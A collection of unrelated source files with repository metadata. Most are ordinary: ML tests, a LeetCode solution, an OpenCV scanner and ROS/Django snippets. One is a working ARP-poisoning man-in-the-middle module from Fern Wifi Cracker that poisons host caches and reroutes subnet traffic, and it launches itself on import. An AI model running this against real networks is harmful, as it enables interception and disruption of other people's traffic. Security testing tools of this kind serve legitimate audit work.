export_utils, 'logging', new_callable=MockLog) as mock_logging:
train(training_loops=training_loops, resume_training_loops=True)
logged = mock_logging.as_string()
self.assertEqual(logged.count('loss'), training_loops)
self.assertEqual(logged.count('AverageReturn'), training_loops)
# With `resume_training_loops` set to True, the same `training_loops`
# would not result in more training.
with mock.patch.object(
export_utils, 'logging', new_callable=MockLog) as mock_logging:
train(training_loops=training_loops, resume_training_loops=True)
logged = mock_logging.as_string()
self.assertEqual(logged.count('loss'), 0)
self.assertEqual(logged.count('AverageReturn'), 0)
# With `resume_training_loops` set to True, increasing
# `training_loops` will result in more training.
with mock.patch.object(
export_utils, 'logging', new_callable=MockLog) as mock_logging:
train(training_loops=training_loops + 1, resume_training_loops=True)
logged = mock_logging.as_string()
self.assertEqual(logged.count('loss'), 1)
self.assertEqual(logged.count('AverageReturn'), 1)
expected_num_episodes = (training_loops + 1) * steps_per_loop * batch_size
self.assertEqual(
logged.count(f'NumberOfEpisodes = {expected_num_episodes}'), 1)
# With `resume_training_loops` set to False, `training_loops` of 1
# will result in more training.
with mock.patch.object(
export_utils, 'logging', new_callable=MockLog) as mock_logging:
train(training_loops=1, resume_training_loops=False)
logged = mock_logging.as_string()
self.assertEqual(logged.count('loss'), 1)
self.assertEqual(logged.count('AverageReturn'), 1)
# The number of episodes is expected to accumulate over all trainings using
# the same `root_dir`.
expected_num_episodes = (training_loops + 2) * steps_per_loop * batch_size
self.assertEqual(
logged.count(f'NumberOfEpisodes = {expected_num_episodes}'), 1)
if __name__ == '__main__':
tf.test.main()
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
004867de305d55875c7b5d8dc93e22bff54fff86 | 10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94 | /Python/restore-the-array-from-adjacent-pairs.py | 91aa1ba0ebb1c185e6625d0352c4f6985e14a576 | [
"MIT"
] | permissive | kamyu104/LeetCode-Solutions | f54822059405ef4df737d2e9898b024f051fd525 | 4dc4e6642dc92f1983c13564cc0fd99917cab358 | refs/heads/master | 2023-09-02T13:48:26.830566 | 2023-08-28T10:11:12 | 2023-08-28T10:11:12 | 152,631,182 | 4,549 | 1,651 | MIT | 2023-05-31T06:10:33 | 2018-10-11T17:38:35 | C++ | UTF-8 | Python | false | false | 571 | py | # Time: O(n)
# Space: O(n)
import collections
class Solution(object):
def restoreArray(self, adjacentPairs):
"""
:type adjacentPairs: List[List[int]]
:rtype: List[int]
"""
adj = collections.defaultdict(list)
for u, v in adjacentPairs:
adj[u].append(v)
adj[v].append(u)
result = next([x, adj[x][0]] for x in adj if len(adj[x]) == 1)
while len(result) != len(adjacentPairs)+1:
result.append(adj[result[-1]][adj[result[-1]][0] == result[-2]])
return result
| [
"noreply@github.com"
] | noreply@github.com |
43db2fc680aca832dc48793399f15ccd286de043 | 53fc3f163a02b0f06df05ad385ad175cc057e10a | /tests/renderer/cartographer/image/test_factory.py | 3d863ae4fe02f7da5b56d608b9f12cbcbd3412af | [
"MIT"
] | permissive | Kotaimen/stonemason | 15284d7ca800186b9972d176ff1232ef7f0372e8 | ebbfab294a9e412cc7d04ea1dcb163e45c0de5d2 | refs/heads/develop | 2021-12-10T09:57:46.453283 | 2018-02-15T10:21:35 | 2018-02-15T10:21:35 | 28,327,740 | 5 | 1 | null | 2015-11-10T02:25:45 | 2014-12-22T06:44:58 | Python | UTF-8 | Python | false | false | 1,427 | py | # -*- encoding: utf-8 -*-
__author__ = 'ray'
__date__ = '4/21/15'
import unittest
from stonemason.renderer.cartographer.image import ImageNodeFactory
from stonemason.renderer.cartographer.image.terminal import Color
from stonemason.renderer.cartographer.image.transform import MinFilter
from stonemason.renderer.cartographer.image.composite import AlphaComposer
class TestImageNodeFactory(unittest.TestCase):
def setUp(self):
self.factory = ImageNodeFactory()
def test_create_terminal_node(self):
node = self.factory.create_terminal_node(
'test', 'image.input.color', color='#000')
self.assertIsInstance(node, Color)
def test_create_transform_node(self):
source = self.factory.create_terminal_node(
'test', 'image.input.color', color='#000')
node = self.factory.create_transform_node(
'test', 'image.transform.filter.min', source=source)
self.assertIsInstance(node, MinFilter)
def test_create_composite_layer(self):
source1 = self.factory.create_terminal_node(
'test', 'image.input.color', color='#000')
source2 = self.factory.create_terminal_node(
'test', 'image.input.color', color='#000')
layer = self.factory.create_composite_node(
'test', 'image.composite.alphacomposer', sources=[source1, source2])
self.assertIsInstance(layer, AlphaComposer)
| [
"gliese.q@gmail.com"
] | gliese.q@gmail.com |
b278b96f504d47d06290fc42b8a90ffd778ef32f | 86e1614bc5908cee4cf4a3ca90b6177cbe94cf50 | /DocumentScannerMain.py | bb550d4bc0c1a55935af4036e57ac08020eeafe8 | [] | no_license | aryamanjain036/imageprocessingproject | 0ee4e24e9153174b2a07509db37dfe7357b33cbc | f4ed8e64f102fd2251c831a115a80a4d2e0dbf04 | refs/heads/master | 2023-03-22T11:13:03.817091 | 2021-03-26T04:36:28 | 2021-03-26T04:36:28 | 270,027,598 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,320 | py | import cv2
import numpy as np
import utlis
import pytesseract
webCam = True
imageLocation = "5.jpeg"
cap = cv2.VideoCapture(1)
cap.set(10,160)
heightImg = 480
widthImg = 480
utlis.initializeTrackbars()
count=0
while True:
imgBlank = np.zeros((heightImg,widthImg,3),np.uint8)
if webCam:success, img = cap.read()
else:img = cv2.imread(imageLocation)
img = cv2.imread(imageLocation)
img = cv2.resize(img,(widthImg, heightImg))
imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) #convets the image to grayscale
imgBlur = cv2.GaussianBlur(imgGray, (5, 5), 1) #converts the grayscale image to blured image
thres=utlis.valTrackbars() #using this function we get the trackbars which help us adjust the threshold
imgThreshold = cv2.Canny(imgBlur,thres[0],thres[1])
kernel = np.ones((5, 5))
imgDial = cv2.dilate(imgThreshold, kernel, iterations=2) # APPLY DILATION
imgThreshold = cv2.erode(imgDial, kernel, iterations=1) # APPLY EROSION
## FIND ALL COUNTOURS
imgConts = img.copy()
imgBigConts = img.copy()
contours, hierarchy = cv2.findContours(imgThreshold, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) # FIND ALL CONTOURS
cv2.drawContours(imgConts, contours, -1, (0, 255, 0), 10) # DRAW ALL DETECTED CONTOURS
# FIND THE LARGEST COUNTOUR IN THE FRAME
big, maxArea = utlis.biggestContour(contours) # FIND THE BIGGEST CONTOUR
if big.size != 0:
big=utlis.reorder(big)
cv2.drawContours(imgBigConts, big, -1, (0, 255, 0), 20) # DRAW THE BIGGEST CONTOUR
imgBigConts = utlis.drawRectangle(imgBigConts,big,2)
pts1 = np.float32(big) # PREPARE POINTS FOR WARP
pts2 = np.float32([[0, 0],[widthImg, 0], [0, heightImg],[widthImg, heightImg]]) # PREPARE POINTS FOR WARP
matrix = cv2.getPerspectiveTransform(pts1, pts2)
imgWarpColored = cv2.warpPerspective(img, matrix, (widthImg, heightImg))
#REMOVE EXTRA UNWANTED PIXELS FROM THE SIDES
imgWarpColored=imgWarpColored[20:imgWarpColored.shape[0] - 20, 20:imgWarpColored.shape[1] - 20]
imgWarpColored = cv2.resize(imgWarpColored,(widthImg,heightImg))
# APPLY ADAPTIVE THRESHOLD
imgWarpGray = cv2.cvtColor(imgWarpColored,cv2.COLOR_BGR2GRAY)
imgAdaptiveThre= cv2.adaptiveThreshold(imgWarpGray, 255, 1, 1, 7, 2)
imgAdaptiveThre = cv2.bitwise_not(imgAdaptiveThre)
imgAdaptiveThre=cv2.medianBlur(imgAdaptiveThre,3)
# Image Array for Display
imageArray = ([img,imgGray,imgThreshold,imgConts],
[imgBigConts,imgWarpColored, imgWarpGray,imgAdaptiveThre])
else:
imageArray = ([img,imgGray,imgThreshold,imgConts],
[imgBlank, imgBlank, imgBlank, imgBlank])
# LABELS FOR DISPLAY
lables = [["Original","Gray","Threshold","Contours"],
["Biggest Contour","Warp Prespective","Warp Gray","Adaptive Threshold"]]
stackedImage = utlis.stackImages(imageArray,0.75,lables)
cv2.imshow("Result",stackedImage)
# SAVE IMAGE WHEN 's' key is pressed
if cv2.waitKey(1) & 0xFF == ord('s'):
cv2.imwrite("Scanned/myImage"+str(count)+".jpg",imgWarpColored)
cv2.rectangle(stackedImage, ((int(stackedImage.shape[1] / 2) - 230), int(stackedImage.shape[0] / 2) + 50),
(1100, 350), (0, 255, 0), cv2.FILLED)
cv2.putText(stackedImage, "Scan Saved", (int(stackedImage.shape[1] / 2) - 200, int(stackedImage.shape[0] / 2)),
cv2.FONT_HERSHEY_DUPLEX, 3, (0, 0, 255), 5, cv2.LINE_AA)
cv2.imshow('Result', stackedImage)
pytesseract.pytesseract.tesseract_cmd = r"C:\Program Files\Tesseract-OCR\tesseract.exe"
img = cv2.imread("Scanned/myImage"+str(count)+".jpg")
grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
adaptive_threshold = cv2.adaptiveThreshold(grey, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 111,
11)
text = pytesseract.image_to_string(adaptive_threshold)
print(text)
# cv2.imshow("grey",grey)
# cv2.imshow("adaptive_th",adaptive_threshold)
cv2.waitKey(0)
cv2.waitKey(300)
count += 1
| [
"noreply@github.com"
] | noreply@github.com |
d86da89a7837039de5cc9432332391c1929d6f86 | d2e8ad203a37b534a113d4f0d4dd51d9aeae382a | /django_graphene_authentication/django_graphene_authentication/signals.py | 47adcc189eddf36fa915f1ac41f05cdf7b2ebd8f | [
"MIT"
] | permissive | Koldar/django-koldar-common-apps | 40e24a7aae78973fa28ca411e2a32cb4b2f4dbbf | 06e6bb103d22f1f6522e97c05ff8931413c69f19 | refs/heads/main | 2023-08-17T11:44:34.631914 | 2021-10-08T12:40:40 | 2021-10-08T12:40:40 | 372,714,560 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | from django.dispatch import Signal
# providing_args=['request', 'refresh_token']
refresh_token_revoked = Signal()
# providing_args=['request', 'refresh_token', 'refresh_token_issued']
refresh_token_rotated = Signal()
| [
"massimobono1@gmail.com"
] | massimobono1@gmail.com |
420f08dd3e3e41f5242c270cc9e6a957d4aeaa38 | 47a8b678c8a9b8105a4462253c84a2aad9eb5705 | /test.py | 6b32f8183fc5f34f8e4bdc7d9915b143965a838e | [] | no_license | megdailey/test | 5b7e8692557730081d2c7221d0ccb2858eaf1676 | 504ff9e2bf46b78ebd3bad3eea1670c9c6749658 | refs/heads/master | 2020-05-15T12:27:31.035264 | 2019-04-19T13:49:32 | 2019-04-19T13:49:32 | 182,264,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33 | py | print(2+2)
print(1+1)
print(1+1)
| [
"mmd0130@gmail.com"
] | mmd0130@gmail.com |
be0e8fe88af319157a3e763aa35b275b56f17d8c | 3d794e38aca224f80e1af0eb3536e031cd784c6d | /_posts/some_other_code.py | b731d9cc9d295b6e99c54236ca7d3b64885d7f17 | [
"MIT"
] | permissive | PhilStem/PhilStem.github.io | ffe785683f7b0cbcacef24bc2eaf8441c21dbd7b | cfa3f0a4fc306117e06c24ad8f3999317ef59884 | refs/heads/master | 2022-10-17T21:28:49.895524 | 2020-09-11T18:34:16 | 2020-09-11T18:34:16 | 236,303,734 | 0 | 0 | NOASSERTION | 2022-10-06T09:07:08 | 2020-01-26T11:38:24 | HTML | UTF-8 | Python | false | false | 91 | py | from sklearn.utils.estimator_checks import check_estimator
check_estimator(LinearRegressor) | [
"philipp.stemberger@gmail.com"
] | philipp.stemberger@gmail.com |
e9e739c00119abf72ad26943f9ddfdbcd2dc0696 | db56c00e7ab30329bd53d8ee35caad94dc13efb6 | /src/hex_control/hex_control/spi_bridge.py | 486926daf1031295e05dc8237bf32899adebed0a | [] | no_license | Wojcik98/hexapod | a7bbdedba3eec6f662c52671956408d74fee3a2b | dc6d01dfd27b4a31f3abeabb9acfe202640cb6d8 | refs/heads/master | 2023-06-09T00:28:43.015250 | 2021-06-30T10:11:24 | 2021-06-30T10:11:24 | 321,147,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,412 | py | import spidev
import rclpy
from std_msgs.msg import UInt8MultiArray
from rclpy.node import Node
SPI_SPEED = 2000000
class SpiBridge(Node):
def __init__(self):
super().__init__('spi_bridge')
self.spi = spidev.SpiDev()
self.spi.open(0, 0)
self.spi.max_speed_hz = SPI_SPEED
"""Update frequency
Single targets: {baudrate} / ({uart frame length} * {cmd length} * {number of joint})
= 115200 / (9 * 4 * 18) ~= 177Hz <- autodetect-baudrate on maestro
= 200000 / (9 * 4 * 18) ~= 300Hz <- fixed-baudrate on maestro
Multiple targets: {baudrate} / ({uart frame length} * ({header length} + {mini-cmd length} * {number of joints}))
= 115200 / (9 * (3 + 2 * 18)) ~= 320Hz
= 200000 / (9 * (3 + 2 * 18)) ~= 560Hz"""
self.subscription = self.create_subscription(
UInt8MultiArray, 'stm32_cmd', self.callback, 10
)
def callback(self, msg: UInt8MultiArray):
now = self.get_clock().now()
data = bytearray(msg.data)
self.spi.xfer3(data)
elapsed = self.get_clock().now() - now
print(f"Sent {len(data)} bytes in {elapsed.nanoseconds / 10**9:.3f}s")
def main(args=None):
rclpy.init(args=args)
node = SpiBridge()
print('SPI Bridge ready!')
rclpy.spin(node)
node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
| [
"wojcikmichal98@gmail.com"
] | wojcikmichal98@gmail.com |
9eb53df032e3c06138e6c43f5b306169140d64a0 | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part006719.py | 42aa4358fcc37db511e0345b6fdde91a2bd9246d | [] | no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,596 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher47811(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({}), [
(VariableWithCount('i2.2.1.0', 1, 1, None), Mul),
(VariableWithCount('i2.3.2.2.1.0_1', 1, 1, S(1)), Mul)
]),
1: (1, Multiset({}), [
(VariableWithCount('i2.2.1.1', 1, 1, None), Mul),
(VariableWithCount('i2.3.2.2.1.0_1', 1, 1, S(1)), Mul)
]),
2: (2, Multiset({}), [
(VariableWithCount('i2.3.2.2.1.0', 1, 1, None), Mul),
(VariableWithCount('i2.3.2.2.1.0_2', 1, 1, S(1)), Mul)
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Mul
max_optional_count = 1
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher47811._instance is None:
CommutativeMatcher47811._instance = CommutativeMatcher47811()
return CommutativeMatcher47811._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 47810
return
yield
from collections import deque | [
"franz.bonazzi@gmail.com"
] | franz.bonazzi@gmail.com |
b3f84d79385b2e8fd9a8f9a72177eabb2b44ec3c | f846aad1778d33ff59a8c931a9107bb7819a8a7a | /Fern-Wifi-Cracker-Py3/core/toolbox/MITM_Core.py | 40844758ae482711fe731c4ddef071fc895ee535 | [] | no_license | kimocoder/fern-wifi-cracker | f170f397bd34c5ab04849fb935c0f50856ef70b3 | 04818cb97bf2068e3015c954dbeaa510b95caa29 | refs/heads/master | 2023-04-27T07:29:00.385430 | 2019-06-01T09:58:46 | 2019-06-01T09:58:46 | 91,082,900 | 2 | 0 | null | 2019-06-01T09:59:12 | 2017-05-12T11:03:19 | Python | UTF-8 | Python | false | false | 11,507 | py | #-------------------------------------------------------------------------------
# Name: MITM Core (Man In The Middle)
# Purpose: Redirecting Network traffic to attack host by various MITM engines
#
# Author: Saviour Emmanuel Ekiko
#
# Created: 15/08/2012
# Copyright: (c) Fern Wifi Cracker 2011
# Licence: <GNU GPL v3>
#
#
#-------------------------------------------------------------------------------
# GNU GPL v3 Licence Summary:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import time
import thread
import threading
from scapy.all import *
class Fern_MITM_Class:
class ARP_Poisoning(object):
def __init__(self):
self._attack_option = str() # "ARP POISON" or "ARP POISON + ROUTE" or "DOS"
self.interface_card = str() # eth0, wlan0
self.gateway_IP_address = str() # Router or default gateway address
self._gateway_MAC_addr = str() # Router Mac Address, set by _set_Gateway_MAC()
self.subnet_hosts = {} # Holds IP Address to Mac Address Mappings of Subnet Hosts e.g {"192.168.0.1":"00:C0:23:DF:87"}
self.control = True # Used to control the processes. if False -> Stop
self.semaphore = threading.BoundedSemaphore(15)
self._local_mac = str() # Mac address for interface card
self._local_IP_Address = str() # IP address for interface card
def ARP_Who_Has(self,target_ip_address):
'''Send ARP request, remote host returns its MAC Address'''
ethernet = Ether(dst = "ff:ff:ff:ff:ff:ff",src = self._local_mac)
arp_packet = ARP(hwtype = 0x1,ptype = 0x800,hwlen = 0x6,plen = 0x4,
op = "who-has",hwsrc = self._local_mac,psrc = self._local_IP_Address,hwdst =
"00:00:00:00:00:00",pdst = target_ip_address)
padding_packet = Padding(load = "\x00"*18)
ARP_who_has_packet = ethernet/arp_packet/padding_packet
return(ARP_who_has_packet)
def ARP_Is_At(self,ip_address,target_mac_address):
'''Poisons Cache with fake target mac address'''
ethernet = Ether(dst = 'ff:ff:ff:ff:ff:ff',src = self._local_mac)
arp_packet = ARP(hwtype = 0x1,ptype = 0x800,hwlen = 0x6,plen = 0x4,
op = "is-at",hwsrc = self._local_mac,psrc = self.gateway_IP_address,hwdst =
'ff:ff:ff:ff:ff:ff',pdst = ip_address)
padding_packet = Padding(load = "\x00"*18)
ARP_is_at_packet = ethernet/arp_packet/padding_packet
return(ARP_is_at_packet)
def _gateway_MAC_Probe(self):
'''_set_Gate_Mac worker, runs thread that
sends and ARP who as packet to fecth gateway mac'''
while(self.control):
packet = self.ARP_Who_Has(self.gateway_IP_address)
sendp(packet,iface = self.interface_card)
if(self._gateway_MAC_addr):
break
time.sleep(3)
def _set_Gateway_MAC(self):
'''Fetches the Gateway MAC address'''
self._gateway_MAC_addr = str()
thread.start_new_thread(self._gateway_MAC_Probe,())
while not self._gateway_MAC_addr:
reply = sniff(filter = "arp",count = 2)[1]
if(reply.haslayer(ARP)):
if((reply.op == 0x2) and (reply.psrc == self.gateway_IP_address)):
self._gateway_MAC_addr = reply.hwsrc
break
def _network_Hosts_Probe(self):
'''ARP sweep subnet for available hosts'''
while(self.control):
segment = int(self.gateway_IP_address[:self.gateway_IP_address.index(".")])
if segment in range(1,127): # Class A IP address
address_func = self.class_A_generator
elif segment in range(128,191): # Class B IP address
address_func = self.class_B_generator
else: # Class C IP address
address_func = self.class_C_generator
for address in address_func(self.gateway_IP_address):
if not self.control:
return
time.sleep(0.01)
packet = self.ARP_Who_Has(address)
sendp(packet,iface = self.interface_card) # Send Who has packet to all hosts on subnet
time.sleep(30)
def _get_Network_Hosts_Worker(self,reply):
'''thread worker for the _get_Netword_Host method'''
self.semaphore.acquire()
try:
if(reply.haslayer(ARP)):
if((reply.op == 0x2) and (reply.hwsrc != self._local_mac)):
if not self.subnet_hosts.has_key(reply.hwsrc):
if(str(reply.hwsrc) != str(self._gateway_MAC_addr)):
self.subnet_hosts[reply.psrc] = reply.hwsrc
finally:
self.semaphore.release()
def _get_Network_Hosts(self):
'''Receives ARP is-at from Hosts on
the subnet'''
packet_count = 1
thread.start_new_thread(self._network_Hosts_Probe,())
sniff(filter = "arp",prn = self._get_Network_Hosts_Worker,store = 0)
def _poison_arp_cache(self):
'''Poisions ARP cache of detected Hosts'''
while(self.control):
for ip_address in self.subnet_hosts.keys():
packet = self.ARP_Is_At(ip_address,self.subnet_hosts[ip_address])
sendp(packet,iface = self.interface_card)
time.sleep(5)
def _redirect_network_traffic_worker(self,routed_data):
''' Thread worker for the _redirect_network_traffic() method'''
self.semaphore.acquire()
try:
if(routed_data.haslayer(Ether)):
if(routed_data.getlayer(Ether).dst == self._local_mac):
routed_data.getlayer(Ether).dst = self._gateway_MAC_addr
sendp(routed_data,iface = self.interface_card)
finally:
self.semaphore.release()
def _redirect_network_traffic(self):
'''Redirect traffic to the Gateway Address'''
sniff(prn = self._redirect_network_traffic_worker,store = 0)
def Start_ARP_Poisoning(self,route_enabled = True):
'''Start ARP Poisoning Attack'''
self.control = True
self._local_mac = self.get_Mac_Address(self.interface_card).strip()
self._local_IP_Address = self.get_IP_Adddress()
self._set_Gateway_MAC()
thread.start_new_thread(self._get_Network_Hosts,()) # Get all network hosts on subnet
if(route_enabled):
thread.start_new_thread(self._redirect_network_traffic,()) # Redirect traffic to default gateway
self._poison_arp_cache() # Poison the cache of all network hosts
#################### OS NETWORKING FUNCTIONS #####################
def get_Mac_Address(self,interface):
sys_net = "/sys/class/net/" + interface + "/address"
addr = open(sys_net,"r")
mac_addr = addr.read()
addr.close()
return(mac_addr)
def get_IP_Adddress(self):
import re
import commands
regex = "inet addr:((\d+.){3}\d+)"
sys_out = commands.getstatusoutput("ifconfig " + self.interface_card)[1]
result = re.findall(regex,sys_out)
if(result):
return(result[0][0])
return("0.0.0.0")
def class_A_generator(self,address):
'''Generates CIDR class A adresses'''
#/8 Class A address host range = pow(2,24) -2
mod = address.index('.')
address = address[:mod] + '.%d' * 3
for first_octect in range(255):
for second_octect in range(255):
for third_octect in range(255):
yield(address % (first_octect,\
second_octect,third_octect))
def class_B_generator(self,address):
'''Generates CIDR class B adresses'''
#/16 Class B address host range = pow(2,16) -2
mod = address.rindex('.')
address = address[:address[0:mod].rindex('.')] + '.%d'*2
for first_octect in range(255):
for second_octect in range(255):
yield(address % (\
first_octect,second_octect))
def class_C_generator(self,address):
'''Generates CIDR class C adresses'''
#/24 Class C address host range = pow(2,8) -2
process = address.rindex('.')
address = address[:process] + '.%d'
for octect in range(255):
yield(address % octect)
#################### OS NETWORKING FUNCTIONS END ########################
def set_Attack_Option(self,option):
'''"ARP POISON" or "ARP POISON + ROUTE" or "DOS"'''
self._attack_option = option
def run_attack(self):
attack_options = ["ARP POISON","ARP POISON + ROUTE","DOS"]
if(self._attack_option == "ARP POISON"):
self.Start_ARP_Poisoning(False)
if(self._attack_option == "ARP POISON + ROUTE"):
self.Start_ARP_Poisoning(True)
if(self._attack_option == "DOS"):
self.Start_ARP_Poisoning(False)
if(self._attack_option == str()):
raise Exception("Attack Type has not been set")
if(self._attack_option not in attack_options):
raise Exception("Invalid Attack Option")
instance = Fern_MITM_Class.ARP_Poisoning()
instance.interface_card = os.environ["interface_card"]
instance.gateway_IP_address = os.environ["gateway_ip_address"]
instance.set_Attack_Option("ARP POISON + ROUTE")
instance.run_attack()
# Usage:
# instance = Fern_MITM_Class.ARP_Poisoning()
# instance.interface_card = "eth0"
# instance.gateway_IP_address = "192.168.133.1"
# instance.set_Attack_Option("ARP POISON + ROUTE")
# instance.start()
# instance.stop()
| [
"simone.mione1@gmail.com"
] | simone.mione1@gmail.com |
3c6a173d531bdd508f51562417c45192f91fcba7 | 9319dddcfded4150ca9ee7b2a08c6ad993f20005 | /model/BmeEntity.py | d55aa036a247ded4e7388e58dcea2d10d946c445 | [] | no_license | agrdan/bme_test_1 | 5567a06d71b6ad39b7c2d439657c465e390af6fd | e5715589ee4972bed762581dc4b85ddd7f505455 | refs/heads/master | 2023-03-08T00:16:02.166894 | 2021-02-16T07:27:51 | 2021-02-16T07:27:51 | 339,308,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | from helper import db
class BmeEntity(db.Model):
__tablename__ = 'analytics'
id = db.Column(db.Integer(), primary_key=True)
temperature = db.Column(db.Float())
gas = db.Column(db.Integer())
humidity = db.Column(db.Float())
pressure = db.Column(db.Float())
time = db.Column(db.String(20)) | [
"Andreas.Grdjan@emilfreydigital.hr"
] | Andreas.Grdjan@emilfreydigital.hr |
cccac8d820d9d534647989e6cfc573f5a94e1876 | 5c15aba2bdcd4348c988245f59817cbe71b87749 | /src/trial.py | 00cd0826415c55ab5e87e90071586c86ffae075a | [] | no_license | chengshaozhe/commitmentBenefits | f7db038333ee95217713d1d4b2a1fb3d0c295fdd | 0388803960bc9995ffbcfb6435c134e488a98b63 | refs/heads/master | 2023-03-27T02:31:01.522997 | 2021-01-12T10:18:12 | 2021-01-12T10:18:12 | 310,592,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,356 | py | import numpy as np
import pygame as pg
from pygame import time
import collections as co
import pickle
import random
def calculateGridDis(grid1, grid2):
gridDis = np.linalg.norm(np.array(grid1) - np.array(grid2), ord=1)
return int(gridDis)
def creatRect(coor1, coor2):
vector = np.array(list(zip(coor1, coor2)))
vector.sort(axis=1)
rect = [(i, j) for i in range(vector[0][0], vector[0][1] + 1) for j in range(vector[1][0], vector[1][1] + 1)]
return rect
def calculateAvoidCommitmnetZone(playerGrid, target1, target2):
dis1 = calculateGridDis(playerGrid, target1)
dis2 = calculateGridDis(playerGrid, target2)
if dis1 == dis2:
rect1 = creatRect(playerGrid, target1)
rect2 = creatRect(playerGrid, target2)
avoidCommitmentZone = list(set(rect1).intersection(set(rect2)))
avoidCommitmentZone.remove(tuple(playerGrid))
else:
avoidCommitmentZone = []
return avoidCommitmentZone
def inferGoal(originGrid, aimGrid, targetGridA, targetGridB):
pacmanBean1aimDisplacement = calculateGridDis(targetGridA, aimGrid)
pacmanBean2aimDisplacement = calculateGridDis(targetGridB, aimGrid)
pacmanBean1LastStepDisplacement = calculateGridDis(targetGridA, originGrid)
pacmanBean2LastStepDisplacement = calculateGridDis(targetGridB, originGrid)
bean1Goal = pacmanBean1LastStepDisplacement - pacmanBean1aimDisplacement
bean2Goal = pacmanBean2LastStepDisplacement - pacmanBean2aimDisplacement
if bean1Goal > bean2Goal:
goal = 1
elif bean1Goal < bean2Goal:
goal = 2
else:
goal = 0
return goal
def checkTerminationOfTrial(bean1Grid, bean2Grid, humanGrid):
if calculateGridDis(humanGrid, bean1Grid) == 0 or calculateGridDis(humanGrid, bean2Grid) == 0:
pause = False
else:
pause = True
return pause
class SingleGoalTrial():
def __init__(self, controller, drawNewState, drawText, normalNoise, checkBoundary):
self.controller = controller
self.drawNewState = drawNewState
self.drawText = drawText
self.normalNoise = normalNoise
self.checkBoundary = checkBoundary
def __call__(self, beanGrid, playerGrid, designValues):
obstacles = []
initialPlayerGrid = playerGrid
reactionTime = list()
trajectory = [initialPlayerGrid]
results = co.OrderedDict()
aimActionList = list()
totalStep = int(np.linalg.norm(np.array(playerGrid) - np.array(beanGrid), ord=1))
noiseStep = random.sample(list(range(2, totalStep)), designValues)
stepCount = 0
goalList = list()
self.drawText("+", [0, 0, 0], [7, 7])
pg.time.wait(1300)
self.drawNewState(beanGrid, beanGrid, initialPlayerGrid, obstacles)
pg.event.set_allowed([pg.KEYDOWN, pg.KEYUP, pg.QUIT])
realPlayerGrid = initialPlayerGrid
pause = True
initialTime = time.get_ticks()
while pause:
aimPlayerGrid, aimAction = self.controller(realPlayerGrid, beanGrid, beanGrid)
reactionTime.append(time.get_ticks() - initialTime)
stepCount = stepCount + 1
noisePlayerGrid, realAction = self.normalNoise(realPlayerGrid, aimAction, noiseStep, stepCount)
realPlayerGrid = self.checkBoundary(noisePlayerGrid)
self.drawNewState(beanGrid, beanGrid, realPlayerGrid, obstacles)
trajectory.append(list(realPlayerGrid))
aimActionList.append(aimAction)
pause = checkTerminationOfTrial(beanGrid, beanGrid, realPlayerGrid)
pg.time.wait(500)
pg.event.set_blocked([pg.KEYDOWN, pg.KEYUP])
results["reactionTime"] = str(reactionTime)
results["trajectory"] = str(trajectory)
results["aimAction"] = str(aimActionList)
results["noisePoint"] = str(noiseStep)
return results
class NormalTrial():
def __init__(self, controller, drawNewState, drawText, normalNoise, checkBoundary):
self.controller = controller
self.drawNewState = drawNewState
self.drawText = drawText
self.normalNoise = normalNoise
self.checkBoundary = checkBoundary
def __call__(self, bean1Grid, bean2Grid, playerGrid, obstacles, designValues):
initialPlayerGrid = playerGrid
reactionTime = list()
trajectory = [initialPlayerGrid]
results = co.OrderedDict()
aimActionList = list()
aimPlayerGridList = []
leastStep = min([calculateGridDis(playerGrid, beanGrid) for beanGrid in [bean1Grid, bean2Grid]])
noiseStep = sorted(random.sample(list(range(2, leastStep)), designValues))
stepCount = 0
goalList = list()
self.drawText("+", [0, 0, 0], [7, 7])
pg.time.wait(1300)
self.drawNewState(bean1Grid, bean2Grid, initialPlayerGrid, obstacles)
pg.event.set_allowed([pg.KEYDOWN, pg.KEYUP, pg.QUIT])
realPlayerGrid = initialPlayerGrid
pause = True
initialTime = time.get_ticks()
while pause:
aimPlayerGrid, aimAction = self.controller(realPlayerGrid, bean1Grid, bean2Grid)
reactionTime.append(time.get_ticks() - initialTime)
goal = inferGoal(trajectory[-1], aimPlayerGrid, bean1Grid, bean2Grid)
goalList.append(goal)
stepCount = stepCount + 1
